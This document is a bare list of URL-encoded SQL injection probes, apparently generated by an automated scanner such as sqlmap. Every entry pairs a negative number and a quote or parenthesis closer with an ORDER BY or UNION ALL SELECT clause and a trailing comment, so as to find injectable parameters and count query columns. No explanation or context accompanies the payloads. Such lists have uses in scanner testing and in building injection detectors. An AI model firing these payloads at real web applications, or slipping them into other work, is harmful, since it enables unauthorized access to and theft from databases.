-2534%27%29%20ORDER%20BY%201%23 -3226%27%29%20ORDER%20BY%205116%23 -7816%27%29%20UNION%20ALL%20SELECT%208253%23 -2424%27%29%20UNION%20ALL%20SELECT%203527%2C3527%23 -7837%27%29%20UNION%20ALL%20SELECT%205961%2C5961%2C5961%23 -9252%27%29%20UNION%20ALL%20SELECT%209164%2C9164%2C9164%2C9164%23 -5051%27%29%20UNION%20ALL%20SELECT%206533%2C6533%2C6533%2C6533%2C6533%23 -9757%27%29%20UNION%20ALL%20SELECT%201485%2C1485%2C1485%2C1485%2C1485%2C1485%23 -3489%27%29%20UNION%20ALL%20SELECT%209124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%23 -5760%27%29%20UNION%20ALL%20SELECT%203179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%23 -8242%27%29%20UNION%20ALL%20SELECT%204350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%23 -7687%27%29%20UNION%20ALL%20SELECT%206070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%23 -2774%27%20ORDER%20BY%201%23 -8563%27%20ORDER%20BY%204538%23 -5106%27%20UNION%20ALL%20SELECT%204404%23 -5407%27%20UNION%20ALL%20SELECT%208660%2C8660%23 -4659%27%20UNION%20ALL%20SELECT%202224%2C2224%2C2224%23 -1618%27%20UNION%20ALL%20SELECT%205044%2C5044%2C5044%2C5044%23 -2672%27%20UNION%20ALL%20SELECT%208221%2C8221%2C8221%2C8221%2C8221%23 -1283%27%20UNION%20ALL%20SELECT%208266%2C8266%2C8266%2C8266%2C8266%2C8266%23 -2803%27%20UNION%20ALL%20SELECT%203928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%23 -6620%27%20UNION%20ALL%20SELECT%204540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%23 -4792%27%20UNION%20ALL%20SELECT%205351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%23 -9467%27%20UNION%20ALL%20SELECT%207563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%23 -1917%22%20ORDER%20BY%201%23 -1195%22%20ORDER%20BY%205835%23 -9826%22%20UNION%20ALL%20SELECT%208827%23 -1619%22%20UNION%20ALL%20SELECT%205105%2C5105%23 -6726%22%20UNION%20ALL%20SELECT%208277%2C8277%2C8277%23 -6409%22%20UNION%20ALL%20SELECT%207517%2C7517%2C7517%2C7517%23 -8556%22%20UNION%20ALL%20SELECT%202358%2C2358%2C2358%2C2358%2C2358%23 -5630%22%20UNION%20ALL%20SELECT%208790%2C8790%2C8790%2C8790%2C8790%2C8790%23 -7662%22%20UNION%20ALL%20SELECT%204936%2C4936%2C4936%2C4936%2C4936%2C4936%2C4936%23 -4523%22%20UNION%20ALL%20SELECT%208256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%23 -5158%22%20UNION%20ALL%20SELECT%208806%2C8806%2C8806%2C8806%2C8806%2C8806%2C8806%2C8806%2C8806%23 -4796%22%20UNION%20ALL%20SELECT%203385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%23 -4888%27%29%20ORDER%20BY%201%23 -5854%27%29%20ORDER%20BY%204672%23 -5989%27%29%20UNION%20ALL%20SELECT%201769%23 -8549%27%29%20UNION%20ALL%20SELECT%202859%2C2859%23 -2668%27%29%20UNION%20ALL%20SELECT%201428%2C1428%2C1428%23 -9382%27%29%20UNION%20ALL%20SELECT%204970%2C4970%2C4970%2C4970%23 -9838%27%29%20UNION%20ALL%20SELECT%209122%2C9122%2C9122%2C9122%2C9122%23 -1947%27%29%20UNION%20ALL%20SELECT%207391%2C7391%2C7391%2C7391%2C7391%2C7391%23 -2544%27%29%20UNION%20ALL%20SELECT%201229%2C1229%2C1229%2C1229%2C1229%2C1229%2C1229%23 -1997%27%29%20UNION%20ALL%20SELECT%206210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%23 -6889%27%29%20UNION%20ALL%20SELECT%206258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%23 -8110%27%29%20UNION%20ALL%20SELECT%209604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%23 -9025%27%29%29%20ORDER%20BY%201%23 -3896%27%29%29%20ORDER%20BY%206233%23 -1588%27%29%29%20UNION%20ALL%20SELECT%203249%23 -1713%27%29%29%20UNION%20ALL%20SELECT%209700%2C9700%23 -7859%27%29%29%20UNION%20ALL%20SELECT%204692%2C4692%2C4692%23 -3711%27%29%29%20UNION%20ALL%20SELECT%203632%2C3632%2C3632%2C3632%23 -7547%27%29%29%20UNION%20ALL%20SELECT%205874%2C5874%2C5874%2C5874%2C5874%23 -6471%27%29%29%20UNION%20ALL%20SELECT%204864%2C4864%2C4864%2C4864%2C4864%2C4864%23 -3742%27%29%29%20UNION%20ALL%20SELECT%209410%2C9410%2C9410%2C9410%2C9410%2C9410%2C9410%23 -6251%27%29%29%20UNION%20ALL%20SELECT%207005%2C7005%2C7005%2C7005%2C7005%2C7005%2C7005%2C7005%23 -3432%27%29%29%20UNION%20ALL%20SELECT%202261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%2C2261%23 -9089%27%29%29%20UNION%20ALL%20SELECT%201091%2C1091%2C1091%2C1091%2C1091%2C1091%2C1091%2C1091%2C1091%2C1091%23 -9565%27%29%29%29%20ORDER%20BY%201%23 -6384%27%29%29%29%20ORDER%20BY%206184%23 -4175%27%29%29%29%20UNION%20ALL%20SELECT%209325%23 -6041%27%29%29%29%20UNION%20ALL%20SELECT%206191%2C6191%23 -4199%27%29%29%29%20UNION%20ALL%20SELECT%206740%2C6740%2C6740%23 -5882%27%29%29%29%20UNION%20ALL%20SELECT%204363%2C4363%2C4363%2C4363%23 -7867%27%29%29%29%20UNION%20ALL%20SELECT%209948%2C9948%2C9948%2C9948%2C9948%23 -8895%27%29%29%29%20UNION%20ALL%20SELECT%203489%2C3489%2C3489%2C3489%2C3489%2C3489%23 -8344%27%29%29%29%20UNION%20ALL%20SELECT%205312%2C5312%2C5312%2C5312%2C5312%2C5312%2C5312%23 -3589%27%29%29%29%20UNION%20ALL%20SELECT%202950%2C2950%2C2950%2C2950%2C2950%2C2950%2C2950%2C2950%23 -3450%27%29%29%29%20UNION%20ALL%20SELECT%205102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%23 -2360%27%29%29%29%20UNION%20ALL%20SELECT%209499%2C9499%2C9499%2C9499%2C9499%2C9499%2C9499%2C9499%2C9499%2C9499%23 -2267%27%20ORDER%20BY%201%23 -3889%27%20ORDER%20BY%209096%23 -4434%27%20UNION%20ALL%20SELECT%208754%23 -4163%27%20UNION%20ALL%20SELECT%202900%2C2900%23 -8310%27%20UNION%20ALL%20SELECT%206478%2C6478%2C6478%23 -9946%27%20UNION%20ALL%20SELECT%204280%2C4280%2C4280%2C4280%23 -6727%27%20UNION%20ALL%20SELECT%206835%2C6835%2C6835%2C6835%2C6835%23 -9259%27%20UNION%20ALL%20SELECT%207532%2C7532%2C7532%2C7532%2C7532%2C7532%23 -9439%27%20UNION%20ALL%20SELECT%208804%2C8804%2C8804%2C8804%2C8804%2C8804%2C8804%23 -5486%27%20UNION%20ALL%20SELECT%203444%2C3444%2C3444%2C3444%2C3444%2C3444%2C3444%2C3444%23 -4132%27%20UNION%20ALL%20SELECT%204534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%23 -3090%27%20UNION%20ALL%20SELECT%201612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%23 -1549%27%29%20ORDER%20BY%201%23 -4806%27%29%20ORDER%20BY%209714%23 -3422%27%29%20UNION%20ALL%20SELECT%208165%23 -2225%27%29%20UNION%20ALL%20SELECT%205685%2C5685%23 -9334%27%29%20UNION%20ALL%20SELECT%202516%2C2516%2C2516%23 -1729%27%29%20UNION%20ALL%20SELECT%201684%2C1684%2C1684%2C1684%23 -6733%27%29%20UNION%20ALL%20SELECT%202310%2C2310%2C2310%2C2310%2C2310%23 -7183%27%29%20UNION%20ALL%20SELECT%201511%2C1511%2C1511%2C1511%2C1511%2C1511%23 -6424%27%29%20UNION%20ALL%20SELECT%205392%2C5392%2C5392%2C5392%2C5392%2C5392%2C5392%23 -6281%27%29%20UNION%20ALL%20SELECT%207526%2C7526%2C7526%2C7526%2C7526%2C7526%2C7526%2C7526%23 -4865%27%29%20UNION%20ALL%20SELECT%203344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%23 -9626%27%29%20UNION%20ALL%20SELECT%206614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%23 -6990%27%29%29%20ORDER%20BY%201%23 -5134%27%29%29%20ORDER%20BY%205253%23 -7874%27%29%29%20UNION%20ALL%20SELECT%203915%23 -1907%27%29%29%20UNION%20ALL%20SELECT%205043%2C5043%23 -5861%27%29%29%20UNION%20ALL%20SELECT%202819%2C2819%2C2819%23 -7927%27%29%29%20UNION%20ALL%20SELECT%207290%2C7290%2C7290%2C7290%23 -9134%27%29%29%20UNION%20ALL%20SELECT%209444%2C9444%2C9444%2C9444%2C9444%23 -7028%27%29%29%20UNION%20ALL%20SELECT%205027%2C5027%2C5027%2C5027%2C5027%2C5027%23 -2686%27%29%29%20UNION%20ALL%20SELECT%205510%2C5510%2C5510%2C5510%2C5510%2C5510%2C5510%23 -8316%27%29%29%20UNION%20ALL%20SELECT%209760%2C9760%2C9760%2C9760%2C9760%2C9760%2C9760%2C9760%23 -2773%27%29%29%20UNION%20ALL%20SELECT%201890%2C1890%2C1890%2C1890%2C1890%2C1890%2C1890%2C1890%2C1890%23 -1046%27%29%29%20UNION%20ALL%20SELECT%209595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%23 -6758%27%29%29%29%20ORDER%20BY%201%23 -8549%27%29%29%29%20ORDER%20BY%208638%23 -2443%27%29%29%29%20UNION%20ALL%20SELECT%206107%23 -9478%27%29%29%29%20UNION%20ALL%20SELECT%207518%2C7518%23 -3683%27%29%29%29%20UNION%20ALL%20SELECT%206589%2C6589%2C6589%23 -1533%27%29%29%29%20UNION%20ALL%20SELECT%206054%2C6054%2C6054%2C6054%23 -9936%27%29%29%29%20UNION%20ALL%20SELECT%205841%2C5841%2C5841%2C5841%2C5841%23 -5933%27%29%29%29%20UNION%20ALL%20SELECT%209055%2C9055%2C9055%2C9055%2C9055%2C9055%23 -5608%27%29%29%29%20UNION%20ALL%20SELECT%209153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%23 -3994%27%29%29%29%20UNION%20ALL%20SELECT%203277%2C3277%2C3277%2C3277%2C3277%2C3277%2C3277%2C3277%23 -6373%27%29%29%29%20UNION%20ALL%20SELECT%202731%2C2731%2C2731%2C2731%2C2731%2C2731%2C2731%2C2731%2C2731%23 -7414%27%29%29%29%20UNION%20ALL%20SELECT%204504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%23 -1961%27%20ORDER%20BY%201%23 -8158%27%20ORDER%20BY%204984%23 -6454%27%20UNION%20ALL%20SELECT%204331%23 -6342%27%20UNION%20ALL%20SELECT%209397%2C9397%23 -7801%27%20UNION%20ALL%20SELECT%205463%2C5463%2C5463%23 -9981%27%20UNION%20ALL%20SELECT%206676%2C6676%2C6676%2C6676%23 -2829%27%20UNION%20ALL%20SELECT%204807%2C4807%2C4807%2C4807%2C4807%23 -8193%27%20UNION%20ALL%20SELECT%209864%2C9864%2C9864%2C9864%2C9864%2C9864%23 -4299%27%20UNION%20ALL%20SELECT%206331%2C6331%2C6331%2C6331%2C6331%2C6331%2C6331%23 -1263%27%20UNION%20ALL%20SELECT%204396%2C4396%2C4396%2C4396%2C4396%2C4396%2C4396%2C4396%23 -9049%27%20UNION%20ALL%20SELECT%203724%2C3724%2C3724%2C3724%2C3724%2C3724%2C3724%2C3724%2C3724%23 -3335%27%20UNION%20ALL%20SELECT%206556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%2C6556%23 -7109%22%29%20ORDER%20BY%201%23 -8174%22%29%20ORDER%20BY%207313%23 -7146%22%29%20UNION%20ALL%20SELECT%203447%23 -6137%22%29%20UNION%20ALL%20SELECT%208524%2C8524%23 -7105%22%29%20UNION%20ALL%20SELECT%201118%2C1118%2C1118%23 -9121%22%29%20UNION%20ALL%20SELECT%201134%2C1134%2C1134%2C1134%23 -7380%22%29%20UNION%20ALL%20SELECT%205668%2C5668%2C5668%2C5668%2C5668%23 -1428%22%29%20UNION%20ALL%20SELECT%208980%2C8980%2C8980%2C8980%2C8980%2C8980%23 -7303%22%29%20UNION%20ALL%20SELECT%203335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%23 -5586%22%29%20UNION%20ALL%20SELECT%206836%2C6836%2C6836%2C6836%2C6836%2C6836%2C6836%2C6836%23 -6960%22%29%20UNION%20ALL%20SELECT%204667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%23 -4727%22%29%20UNION%20ALL%20SELECT%203629%2C3629%2C3629%2C3629%2C3629%2C3629%2C3629%2C3629%2C3629%2C3629%23 -2638%22%29%29%20ORDER%20BY%201%23 -5117%22%29%29%20ORDER%20BY%204504%23 -3468%22%29%29%20UNION%20ALL%20SELECT%208198%23 -2642%22%29%29%20UNION%20ALL%20SELECT%207863%2C7863%23 -4866%22%29%29%20UNION%20ALL%20SELECT%205299%2C5299%2C5299%23 -4072%22%29%29%20UNION%20ALL%20SELECT%206346%2C6346%2C6346%2C6346%23 -9952%22%29%29%20UNION%20ALL%20SELECT%208140%2C8140%2C8140%2C8140%2C8140%23 -2233%22%29%29%20UNION%20ALL%20SELECT%201112%2C1112%2C1112%2C1112%2C1112%2C1112%23 -6391%22%29%29%20UNION%20ALL%20SELECT%204892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%23 -3112%22%29%29%20UNION%20ALL%20SELECT%206637%2C6637%2C6637%2C6637%2C6637%2C6637%2C6637%2C6637%23 -1758%22%29%29%20UNION%20ALL%20SELECT%202793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%23 -7515%22%29%29%20UNION%20ALL%20SELECT%201039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%23 -5498%22%29%29%29%20ORDER%20BY%201%23 -9604%22%29%29%29%20ORDER%20BY%207748%23 -7787%22%29%29%29%20UNION%20ALL%20SELECT%207418%23 -8521%22%29%29%29%20UNION%20ALL%20SELECT%201322%2C1322%23 -1778%22%29%29%29%20UNION%20ALL%20SELECT%202108%2C2108%2C2108%23 -9831%22%29%29%29%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%23 -8249%22%29%29%29%20UNION%20ALL%20SELECT%205852%2C5852%2C5852%2C5852%2C5852%23 -2962%22%29%29%29%20UNION%20ALL%20SELECT%205562%2C5562%2C5562%2C5562%2C5562%2C5562%23 -4635%22%29%29%29%20UNION%20ALL%20SELECT%201169%2C1169%2C1169%2C1169%2C1169%2C1169%2C1169%23 -2550%22%29%29%29%20UNION%20ALL%20SELECT%208586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%23 -1379%22%29%29%29%20UNION%20ALL%20SELECT%209105%2C9105%2C9105%2C9105%2C9105%2C9105%2C9105%2C9105%2C9105%23 -7264%22%29%29%29%20UNION%20ALL%20SELECT%203258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%23 -2961%22%20ORDER%20BY%201%23 -6609%22%20ORDER%20BY%206085%23 -7454%22%20UNION%20ALL%20SELECT%203085%23 -7548%22%20UNION%20ALL%20SELECT%208674%2C8674%23 -6972%22%20UNION%20ALL%20SELECT%201598%2C1598%2C1598%23 -8234%22%20UNION%20ALL%20SELECT%204681%2C4681%2C4681%2C4681%23 -4991%22%20UNION%20ALL%20SELECT%201388%2C1388%2C1388%2C1388%2C1388%23 -1919%22%20UNION%20ALL%20SELECT%207862%2C7862%2C7862%2C7862%2C7862%2C7862%23 -6937%22%20UNION%20ALL%20SELECT%207917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%23 -4073%22%20UNION%20ALL%20SELECT%206081%2C6081%2C6081%2C6081%2C6081%2C6081%2C6081%2C6081%23 -2437%22%20UNION%20ALL%20SELECT%207679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%23 -2435%22%20UNION%20ALL%20SELECT%206324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%23 -3428%22%29%20ORDER%20BY%201%23 -8378%22%29%20ORDER%20BY%201817%23 -8823%22%29%20UNION%20ALL%20SELECT%203959%23 -7613%22%29%20UNION%20ALL%20SELECT%209224%2C9224%23 -1663%22%29%20UNION%20ALL%20SELECT%208777%2C8777%2C8777%23 -4870%22%29%20UNION%20ALL%20SELECT%207777%2C7777%2C7777%2C7777%23 -9052%22%29%20UNION%20ALL%20SELECT%208434%2C8434%2C8434%2C8434%2C8434%23 -3176%22%29%20UNION%20ALL%20SELECT%202762%2C2762%2C2762%2C2762%2C2762%2C2762%23 -1894%22%29%20UNION%20ALL%20SELECT%206106%2C6106%2C6106%2C6106%2C6106%2C6106%2C6106%23 -9095%22%29%20UNION%20ALL%20SELECT%204720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%23 -8656%22%29%20UNION%20ALL%20SELECT%207953%2C7953%2C7953%2C7953%2C7953%2C7953%2C7953%2C7953%2C7953%23 -4055%22%29%20UNION%20ALL%20SELECT%201723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%23 -9138%22%29%29%20ORDER%20BY%201%23 -9612%22%29%29%20ORDER%20BY%205227%23 -8297%22%29%29%20UNION%20ALL%20SELECT%205066%23 -6538%22%29%29%20UNION%20ALL%20SELECT%207164%2C7164%23 -1184%22%29%29%20UNION%20ALL%20SELECT%209164%2C9164%2C9164%23 -1523%22%29%29%20UNION%20ALL%20SELECT%207078%2C7078%2C7078%2C7078%23 -8141%22%29%29%20UNION%20ALL%20SELECT%202573%2C2573%2C2573%2C2573%2C2573%23 -3423%22%29%29%20UNION%20ALL%20SELECT%206297%2C6297%2C6297%2C6297%2C6297%2C6297%23 -9904%22%29%29%20UNION%20ALL%20SELECT%202840%2C2840%2C2840%2C2840%2C2840%2C2840%2C2840%23 -7413%22%29%29%20UNION%20ALL%20SELECT%203548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%23 -3658%22%29%29%20UNION%20ALL%20SELECT%202196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%23 -5417%22%29%29%20UNION%20ALL%20SELECT%209964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%23 -4450%22%29%29%29%20ORDER%20BY%201%23 -3083%22%29%29%29%20ORDER%20BY%204960%23 -4815%22%29%29%29%20UNION%20ALL%20SELECT%209021%23 -1520%22%29%29%29%20UNION%20ALL%20SELECT%201249%2C1249%23 -5417%22%29%29%29%20UNION%20ALL%20SELECT%205251%2C5251%2C5251%23 -4469%22%29%29%29%20UNION%20ALL%20SELECT%209371%2C9371%2C9371%2C9371%23 -6572%22%29%29%29%20UNION%20ALL%20SELECT%208858%2C8858%2C8858%2C8858%2C8858%23 -1023%22%29%29%29%20UNION%20ALL%20SELECT%204117%2C4117%2C4117%2C4117%2C4117%2C4117%23 -2020%22%29%29%29%20UNION%20ALL%20SELECT%208729%2C8729%2C8729%2C8729%2C8729%2C8729%2C8729%23 -3482%22%29%29%29%20UNION%20ALL%20SELECT%206349%2C6349%2C6349%2C6349%2C6349%2C6349%2C6349%2C6349%23 -1008%22%29%29%29%20UNION%20ALL%20SELECT%201337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%23 -1261%22%29%29%29%20UNION%20ALL%20SELECT%201277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%23 -1491%22%20ORDER%20BY%201%23 -8444%22%20ORDER%20BY%203239%23 -1988%22%20UNION%20ALL%20SELECT%207211%23 -9068%22%20UNION%20ALL%20SELECT%204298%2C4298%23 -5043%22%20UNION%20ALL%20SELECT%208550%2C8550%2C8550%23 -7887%22%20UNION%20ALL%20SELECT%204466%2C4466%2C4466%2C4466%23 -5838%22%20UNION%20ALL%20SELECT%201429%2C1429%2C1429%2C1429%2C1429%23 -5318%22%20UNION%20ALL%20SELECT%204918%2C4918%2C4918%2C4918%2C4918%2C4918%23 -9328%22%20UNION%20ALL%20SELECT%201153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%23 -8829%22%20UNION%20ALL%20SELECT%204762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%23 -1257%22%20UNION%20ALL%20SELECT%203546%2C3546%2C3546%2C3546%2C3546%2C3546%2C3546%2C3546%2C3546%23 -6879%22%20UNION%20ALL%20SELECT%206895%2C6895%2C6895%2C6895%2C6895%2C6895%2C6895%2C6895%2C6895%2C6895%23 -6725%25%27%29%20ORDER%20BY%201%23 -2913%25%27%29%20ORDER%20BY%203460%23 -5508%25%27%29%20UNION%20ALL%20SELECT%207025%23 -2701%25%27%29%20UNION%20ALL%20SELECT%206881%2C6881%23 -9132%25%27%29%20UNION%20ALL%20SELECT%207711%2C7711%2C7711%23 -8752%25%27%29%20UNION%20ALL%20SELECT%208246%2C8246%2C8246%2C8246%23 -5012%25%27%29%20UNION%20ALL%20SELECT%206767%2C6767%2C6767%2C6767%2C6767%23 -1281%25%27%29%20UNION%20ALL%20SELECT%205695%2C5695%2C5695%2C5695%2C5695%2C5695%23 -3915%25%27%29%20UNION%20ALL%20SELECT%203444%2C3444%2C3444%2C3444%2C3444%2C3444%2C3444%23 -2296%25%27%29%20UNION%20ALL%20SELECT%205776%2C5776%2C5776%2C5776%2C5776%2C5776%2C5776%2C5776%23 -7828%25%27%29%20UNION%20ALL%20SELECT%203313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%23 -7522%25%27%29%20UNION%20ALL%20SELECT%207379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%2C7379%23 -2861%25%27%29%29%20ORDER%20BY%201%23 -9611%25%27%29%29%20ORDER%20BY%207301%23 -1710%25%27%29%29%20UNION%20ALL%20SELECT%207596%23 -2186%25%27%29%29%20UNION%20ALL%20SELECT%206899%2C6899%23 -5368%25%27%29%29%20UNION%20ALL%20SELECT%203222%2C3222%2C3222%23 -4977%25%27%29%29%20UNION%20ALL%20SELECT%201680%2C1680%2C1680%2C1680%23 -4094%25%27%29%29%20UNION%20ALL%20SELECT%208645%2C8645%2C8645%2C8645%2C8645%23 -9015%25%27%29%29%20UNION%20ALL%20SELECT%204147%2C4147%2C4147%2C4147%2C4147%2C4147%23 -8272%25%27%29%29%20UNION%20ALL%20SELECT%205600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%23 -4238%25%27%29%29%20UNION%20ALL%20SELECT%209876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%23 -1096%25%27%29%29%20UNION%20ALL%20SELECT%206667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%23 -3436%25%27%29%29%20UNION%20ALL%20SELECT%209101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%23 -4514%25%27%29%29%29%20ORDER%20BY%201%23 -6725%25%27%29%29%29%20ORDER%20BY%201870%23 -4766%25%27%29%29%29%20UNION%20ALL%20SELECT%202069%23 -5584%25%27%29%29%29%20UNION%20ALL%20SELECT%203396%2C3396%23 -9169%25%27%29%29%29%20UNION%20ALL%20SELECT%206482%2C6482%2C6482%23 -5021%25%27%29%29%29%20UNION%20ALL%20SELECT%203815%2C3815%2C3815%2C3815%23 -9678%25%27%29%29%29%20UNION%20ALL%20SELECT%207236%2C7236%2C7236%2C7236%2C7236%23 -1030%25%27%29%29%29%20UNION%20ALL%20SELECT%206596%2C6596%2C6596%2C6596%2C6596%2C6596%23 -1614%25%27%29%29%29%20UNION%20ALL%20SELECT%209369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%23 -1859%25%27%29%29%29%20UNION%20ALL%20SELECT%206337%2C6337%2C6337%2C6337%2C6337%2C6337%2C6337%2C6337%23 -2065%25%27%29%29%29%20UNION%20ALL%20SELECT%202071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%23 -7554%25%27%29%29%29%20UNION%20ALL%20SELECT%203759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%23 -5903%25%27%20ORDER%20BY%201%23 -5476%25%27%20ORDER%20BY%207703%23 -9599%25%27%20UNION%20ALL%20SELECT%206212%23 -6419%25%27%20UNION%20ALL%20SELECT%201271%2C1271%23 -9065%25%27%20UNION%20ALL%20SELECT%203367%2C3367%2C3367%23 -8080%25%27%20UNION%20ALL%20SELECT%205915%2C5915%2C5915%2C5915%23 -6678%25%27%20UNION%20ALL%20SELECT%205717%2C5717%2C5717%2C5717%2C5717%23 -2670%25%27%20UNION%20ALL%20SELECT%208454%2C8454%2C8454%2C8454%2C8454%2C8454%23 -8035%25%27%20UNION%20ALL%20SELECT%201222%2C1222%2C1222%2C1222%2C1222%2C1222%2C1222%23 -3523%25%27%20UNION%20ALL%20SELECT%202434%2C2434%2C2434%2C2434%2C2434%2C2434%2C2434%2C2434%23 -8764%25%27%20UNION%20ALL%20SELECT%208650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%23 -4640%25%27%20UNION%20ALL%20SELECT%206834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%23 -3360%00%27%29%20ORDER%20BY%201%23 -1025%00%27%29%20ORDER%20BY%205274%23 -4809%00%27%29%20UNION%20ALL%20SELECT%202958%23 -5804%00%27%29%20UNION%20ALL%20SELECT%205232%2C5232%23 -1061%00%27%29%20UNION%20ALL%20SELECT%204607%2C4607%2C4607%23 -4132%00%27%29%20UNION%20ALL%20SELECT%205841%2C5841%2C5841%2C5841%23 -5430%00%27%29%20UNION%20ALL%20SELECT%209048%2C9048%2C9048%2C9048%2C9048%23 -2427%00%27%29%20UNION%20ALL%20SELECT%205098%2C5098%2C5098%2C5098%2C5098%2C5098%23 -5067%00%27%29%20UNION%20ALL%20SELECT%203427%2C3427%2C3427%2C3427%2C3427%2C3427%2C3427%23 -3149%00%27%29%20UNION%20ALL%20SELECT%208408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%23 -9951%00%27%29%20UNION%20ALL%20SELECT%203568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%23 -5567%00%27%29%20UNION%20ALL%20SELECT%209796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%2C9796%23 -3728%00%27%20ORDER%20BY%201%23 -4961%00%27%20ORDER%20BY%201997%23 -1857%00%27%20UNION%20ALL%20SELECT%206190%23 -6243%00%27%20UNION%20ALL%20SELECT%206687%2C6687%23 -2190%00%27%20UNION%20ALL%20SELECT%201636%2C1636%2C1636%23 -6588%00%27%20UNION%20ALL%20SELECT%208007%2C8007%2C8007%2C8007%23 -6245%00%27%20UNION%20ALL%20SELECT%204558%2C4558%2C4558%2C4558%2C4558%23 -7744%00%27%20UNION%20ALL%20SELECT%209558%2C9558%2C9558%2C9558%2C9558%2C9558%23 -6635%00%27%20UNION%20ALL%20SELECT%202894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%23 -3737%00%27%20UNION%20ALL%20SELECT%209043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%23 -9282%00%27%20UNION%20ALL%20SELECT%204860%2C4860%2C4860%2C4860%2C4860%2C4860%2C4860%2C4860%2C4860%23 -9739%00%27%20UNION%20ALL%20SELECT%209735%2C9735%2C9735%2C9735%2C9735%2C9735%2C9735%2C9735%2C9735%2C9735%23 -9214%27%29%20WHERE%204634%3D4634%20ORDER%20BY%201%23 -2728%27%29%20WHERE%203740%3D3740%20ORDER%20BY%209984%23 -1534%27%29%20WHERE%204422%3D4422%20UNION%20ALL%20SELECT%204422%23 -4816%27%29%20WHERE%209899%3D9899%20UNION%20ALL%20SELECT%209899%2C9899%23 -7990%27%29%20WHERE%208040%3D8040%20UNION%20ALL%20SELECT%208040%2C8040%2C8040%23 -4519%27%29%20WHERE%203380%3D3380%20UNION%20ALL%20SELECT%203380%2C3380%2C3380%2C3380%23 -7354%27%29%20WHERE%205679%3D5679%20UNION%20ALL%20SELECT%205679%2C5679%2C5679%2C5679%2C5679%23 -6910%27%29%20WHERE%207534%3D7534%20UNION%20ALL%20SELECT%207534%2C7534%2C7534%2C7534%2C7534%2C7534%23 -6354%27%29%20WHERE%209523%3D9523%20UNION%20ALL%20SELECT%209523%2C9523%2C9523%2C9523%2C9523%2C9523%2C9523%23 -8521%27%29%20WHERE%205444%3D5444%20UNION%20ALL%20SELECT%205444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%23 -6261%27%29%20WHERE%206670%3D6670%20UNION%20ALL%20SELECT%206670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%23 